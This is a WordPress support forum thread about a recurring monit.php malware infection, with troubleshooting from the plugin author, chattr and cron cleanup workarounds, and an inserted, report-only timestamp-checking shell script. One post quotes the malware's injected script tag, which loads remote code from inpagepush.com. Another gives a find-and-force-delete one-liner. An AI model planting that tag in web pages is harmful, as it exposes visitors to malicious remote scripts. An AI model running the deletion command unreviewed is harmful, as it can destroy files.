• Hello,

    I have just installed your plugin and it found monit.php and it can't remove it.

    It removed some other files that seem to be connected with that malware.
    I have tried to clean again but no luck.
    The items highlighted in red have been found to be re-infected. The malicious code has returned and needs to be cleaned again. But it still doesn't remove them.

    Any ideas?

    • This topic was modified 4 years, 5 months ago by birken.
Viewing 9 replies - 1 through 9 (of 9 total)
  • Plugin Author Eli

    (@scheeeli)

    There is one important distinction that needs to be made before we can know how to proceed. You have said “can’t remove” the infection, and the infection “comes back”, and we need to know which one it is.

    How long after the cleaning did you check the file?

    Can you verify if that file was clean right after the fix was applied?

    Can you verify if the fix failed to clean the file at all?

    If the answer to any of these is unclean then you can send me a screenshot of the scan results, the fix results, the quarantine, and the stat results on that file (specifically the Changed and Modified timestamps on that file). Then I can determine what is actually going on here.

    @scheeeli monit.php
    adds this to my WP files.

    <script type="text/javascript" src="//inpagepush.com/400/3336702" data-cfasync="false" async="async"></script>

    Please add it to your plugin.

    Thanks

    Plugin Author Eli

    (@scheeeli)

    Is this script tag injected into your DB or added to a file on your server?

    Where did you find this script?

    I need the full context of this script in order to write a definition for it. Can you please send me the infected file?

    Thread Starter birken

    (@birken)

    Hello Eli,

    Is the question for me or dkcross?

    Plugin Author Eli

    (@scheeeli)

    Hi @birken,

    My latest question was for @dkcross but I never got an answer from you to my prior post. Did you get your original issue resolved or do you need more help too?

    I have found a solution for it, you require FTP/SSH access to your server.

    Step 1. Follow the first 4 steps mentioned in this link: (Make sure to follow the first 4 steps correctly to disinfect your server & database of malicious code; do not delete any other files yet).

    Step 2. Navigate to /wp-content/plugins/ folder and locate the following two files in the folder

    a. monit.php
    b. admin_ips.txt

    Using a text editor, remove all the contents of them and save them (be sure to remove all the contents).

    Step 3. With SSH: enter the following commands to make monit.php and admin_ips.txt write-protected, which will prevent the malicious code from appearing again even after you delete the files and database entries.

    chattr +i monit.php
    chattr +i admin_ips.txt

    With FTP client: Right-click on monit.php and admin_ips.txt and uncheck all the ticks in the Read, Write, Execute file permission section to make them write-protected. This has worked well on many sites where I have been called to fix this issue.

    Plugin Author Eli

    (@scheeeli)

    Hi @kailashaddanki,
    While steps 1 and 2 are helpful when manually cleaning one specific type of threat that my plugin is already removing automatically for these users, it does not address the issue of this topic (that this threat keeps coming back).

    In step three you have outlined one way to prevent specific files from being overwritten, but it requires not only that the user be able to SSH into their server but also that they are a super-user on that server, which is rare. This solution does not address the real issue here, which is that hackers are able to write to these files, and most probably any file on the site. The problem here suggests that there is a back-door or some other exploitable vulnerability on their site or server that is allowing an unauthorized user to write to their filesystem. Therefore, these sites will not be safe until the root cause of this infection is uncovered.

    While my plugin already has many variants of patterns of known threats that are commonly responsible for this hack, there are new threats and exploits discovered every day and I add them to my definition updates whenever they are uncovered.

    Neither of the people who have posted their issue in this thread have replied to my follow-up questions so I would like to assume that they have used my plugin with the latest definition updates to fix the root cause of this issue and do not need any further help. However, I look forward to working with anyone who is having trouble keeping their site clean to discover the root cause so that I can add it to my definitions. This will help all those who come across the same kind of persistent infection in the future.

    I had a lot of trouble with this as it kept coming back despite all the efforts and scans with several tools.
    I have created a cron job in cpanel as a workaround to detect and delete monit.php from all of your WP installations.

    Note: Obviously this is NOT a proactive solution, so using strict security measures is necessary on top of this.

    find . -type f -name "monit.php" -exec echo {} \; -exec stat {} \; -exec rm -f {} \; | mailx -E -s "monit.php threat deleted" YOUR_EMAIL_ADDRESS

    https://forraskod.blogspot.com/2020/08/monitphp-malware.html
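
Added example, not part of any post in this thread and not the plugin's own code: a report-only shell helper for the Changed/Modified timestamp check requested earlier in the thread, which also lists other PHP files changed around the same moment as monit.php so the component that rewrites it can be looked for. It assumes GNU find and awk; the function names and the path in the usage comment are hypothetical.

```shell
#!/bin/sh
# Report-only triage helper: nothing is deleted or modified.
# Assumes GNU find (-printf) and any POSIX awk.

# list_php_times DIR
# Prints "ctime<TAB>mtime<TAB>path" (epoch seconds) for every .php file under DIR.
list_php_times() {
    find "$1" -type f -name '*.php' -printf '%C@\t%T@\t%p\n'
}

# changed_near DIR NAME [WINDOW_SECONDS]
# Prints "path<TAB>flag" for each PHP file whose Changed time (ctime) lies
# within WINDOW_SECONDS (default 300) of any file called NAME under DIR.
# NAME itself must end in .php to be picked up. flag is "backdated" when the
# Modified time is more than a day older than the Changed time, i.e. the
# mtime no longer says when the file was really written; otherwise "ok".
changed_near() {
    cn_dir=$1
    cn_name=$2
    cn_win=${3:-300}
    list_php_times "$cn_dir" | awk -F'\t' -v name="$cn_name" -v win="$cn_win" '
        {
            c[NR] = $1; m[NR] = $2; p[NR] = $3
            n = split($3, parts, "/")
            if (parts[n] == name) ref[++r] = $1   # ctime of each NAME found
        }
        END {
            for (i = 1; i <= NR; i++)
                for (j = 1; j <= r; j++) {
                    d = c[i] - ref[j]
                    if (d < 0) d = -d
                    if (d <= win) {
                        printf "%s\t%s\n", p[i], (c[i] - m[i] > 86400 ? "backdated" : "ok")
                        break
                    }
                }
        }'
}

# Usage (hypothetical path), run before deleting or cleaning monit.php:
#   changed_near /home/USER/public_html monit.php 300
```

Changed time is also updated by permission changes and by a cleaner rewriting the file, so the report is most useful when taken before any cleaning step touches the files.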

    Following. This is a real problem to WordPress. I just recently cleaned my website, changed credentials, and manually and activated Wordfence Pro. The monit plugin came back.

  • The topic ‘monit.php coming back’ is closed to new replies.